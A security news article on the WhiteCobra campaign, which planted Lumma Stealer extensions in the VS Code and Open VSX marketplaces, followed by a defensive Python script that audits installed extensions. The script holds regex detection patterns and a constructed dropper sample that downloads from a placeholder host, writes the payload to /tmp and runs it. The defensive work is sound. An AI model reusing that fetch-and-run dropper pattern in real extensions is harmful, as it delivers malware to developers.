
Researchers uncovered 24 malicious extensions in Microsoft’s Visual Studio Marketplace and the open source Open VSX Registry, with threat group WhiteCobra targeting developers and cryptocurrency users through malware-laced code.
Developer extension marketplaces have once again been abused for malware distribution, with researchers uncovering a campaign that seeded malicious extensions into both Microsoft's Visual Studio Marketplace and the open-source Open VSX Registry.
Cybersecurity researchers, along with Ethereum developer Zak Cole, identified 24 malicious extensions across the two registries. The extensions deployed Lumma Stealer, an infostealer capable of extracting passwords, payment data, session cookies, sensitive files, and cryptocurrency wallet details. On Windows, the extension ran Lumma directly; on macOS, it dropped a Mach-O binary that loaded an as-yet-unidentified malware strain, so the payload was selected by platform rather than shipped as a single binary.
The campaign, attributed to a threat actor dubbed WhiteCobra, specifically targeted cryptocurrency holders and software developers. Even after takedown, removed extensions were quickly replaced with fresh malicious uploads, underscoring the scale and persistence of the operation.
The Visual Studio Marketplace, owned by Microsoft, remains one of the most widely used developer platforms, hosting over 48,000 extensions tightly integrated with Visual Studio and VS Code. The Open VSX Registry, a vendor-neutral, open-source alternative, is gaining traction in enterprise environments: it serves VS Code-compatible editors such as Eclipse Theia, Gitpod, and SAP Business Application Studio, and hosts around 3,000 extensions from more than 1,500 publishers, with over 2 million monthly downloads.
Security experts warn that the trust-based publishing model of extension registries makes them highly attractive to cybercriminals. Anyone can publish at scale, extensions run with the full privileges of the developer's account and editor, and they sit at the centre of the development workflow, which together create a powerful vector for malware distribution. The speed with which removed extensions reappeared highlights how hard moderation is at publishing scale, a problem that affected Microsoft's own marketplace in this campaign just as much as the open-source registry.
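A practical follow-up for defenders is to audit what is actually installed on developer machines rather than trusting the registry. The script below is an added example written for this page, not code from the researchers or from either registry. It walks a VS Code extensions directory, reads each extension's package.json and main entry script, and flags three things: publishers outside a local allowlist, unconditional activation (`*` or `onStartupFinished`), and entry scripts that branch on `process.platform`, spawn processes, write files, or fetch remote content, the shape a platform-aware dropper like the one described above would take. The regex heuristics, the allowlist, and the two sample extensions it builds in a temporary directory (one benign, one dropper-like, using a reserved `.invalid` domain) are all constructed for the demonstration and are not indicators from the campaign.

```python
"""Audit installed VS Code extensions for dropper-like behaviour (added example)."""
import json
import re
import tempfile
from pathlib import Path

# Heuristic indicators: assumptions made for this example about how a dropper
# extension behaves, not indicators published for the WhiteCobra campaign.
SUSPICIOUS_JS = {
    "spawns a process": re.compile(r"\b(child_process|spawn|execSync|execFile)\b"),
    "fetches remote content": re.compile(r"\b(https?\.get|fetch|axios\.get|request)\s*\("),
    "platform-specific branching": re.compile(r"process\.platform"),
    "writes/chmods files": re.compile(r"\bfs\.(writeFileSync|writeFile|chmodSync)\b"),
    "long hex-escaped string": re.compile(r"(\\x[0-9a-fA-F]{2}){10,}"),
}
BROAD_ACTIVATION = {"*", "onStartupFinished"}
ALLOWLIST = {"acme"}  # publishers you have vetted; constructed for the demo


def audit_extension(ext_dir, allowlist):
    """Return {'id', 'findings'} for one extension directory, or None if no manifest."""
    ext_dir = Path(ext_dir)
    pkg_path = ext_dir / "package.json"
    if not pkg_path.is_file():
        return None
    pkg = json.loads(pkg_path.read_text(encoding="utf-8"))
    publisher = pkg.get("publisher", "")
    findings = []
    if publisher.lower() not in allowlist:
        findings.append(f"publisher '{publisher}' not on allowlist")
    broad = set(pkg.get("activationEvents", [])) & BROAD_ACTIVATION
    if broad:
        findings.append(f"broad activation: {sorted(broad)}")
    main_rel = pkg.get("main")
    if main_rel:
        main_path = ext_dir / main_rel  # pathlib collapses a leading "./"
        if main_path.is_file():
            src = main_path.read_text(encoding="utf-8", errors="replace")
            for label, pattern in SUSPICIOUS_JS.items():
                if pattern.search(src):
                    findings.append(f"{main_rel}: {label}")
    return {"id": f"{publisher}.{pkg.get('name', '')}", "findings": findings}


def audit_directory(root, allowlist=ALLOWLIST):
    """Audit every extension under root (e.g. ~/.vscode/extensions)."""
    results = []
    for entry in sorted(Path(root).iterdir()):
        if entry.is_dir():
            result = audit_extension(entry, allowlist)
            if result:
                results.append(result)
    return results


# Constructed sample extensions. The second imitates a platform-aware dropper;
# the URL uses the reserved .invalid TLD and nothing is taken from real malware.
BENIGN_JS = """const vscode = require("vscode");
function activate(context) {
  context.subscriptions.push(vscode.commands.registerCommand(
    "acme.hello", () => vscode.window.showInformationMessage("hello")));
}
exports.activate = activate;
"""
DROPPER_JS = """const cp = require("child_process"), fs = require("fs"), https = require("https");
function activate() {
  const url = process.platform === "win32" ? "https://c2.example.invalid/w" : "https://c2.example.invalid/m";
  https.get(url, (res) => { let buf = ""; res.on("data", (d) => buf += d);
    res.on("end", () => { fs.writeFileSync("/tmp/upd", buf); cp.spawn("/tmp/upd"); }); });
}
exports.activate = activate;
"""


def build_sample_extensions(root):
    """Write the two constructed extensions in VS Code's publisher.name-version layout."""
    samples = [
        ("acme.hello-theme-1.0.0", {"name": "hello-theme", "publisher": "acme", "main": "./extension.js",
                                    "activationEvents": ["onCommand:acme.hello"]}, BENIGN_JS),
        ("shiny-tools.solidity-helper-0.0.3", {"name": "solidity-helper", "publisher": "shiny-tools",
                                               "main": "./extension.js", "activationEvents": ["*"]}, DROPPER_JS),
    ]
    for dirname, manifest, js in samples:
        d = Path(root) / dirname
        d.mkdir(parents=True)
        (d / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
        (d / "extension.js").write_text(js, encoding="utf-8")


def run_demo():
    """Build the samples in a temp dir and return {extension id: findings}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_extensions(root)
        return {r["id"]: r["findings"] for r in audit_directory(root)}


if __name__ == "__main__":
    for ext_id, findings in run_demo().items():
        print(ext_id, "->", findings or "clean")
```

Pointing `audit_directory` at a real `~/.vscode/extensions` (or the equivalent directory for Theia or Gitpod installs) and your own publisher allowlist turns this into a quick inventory check after an advisory like this one. The heuristics only read the entry script, so a bundled dependency or a second-stage file pulled at runtime will not be seen; the allowlist and activation checks are the reliable part, the regexes are a prompt for manual review.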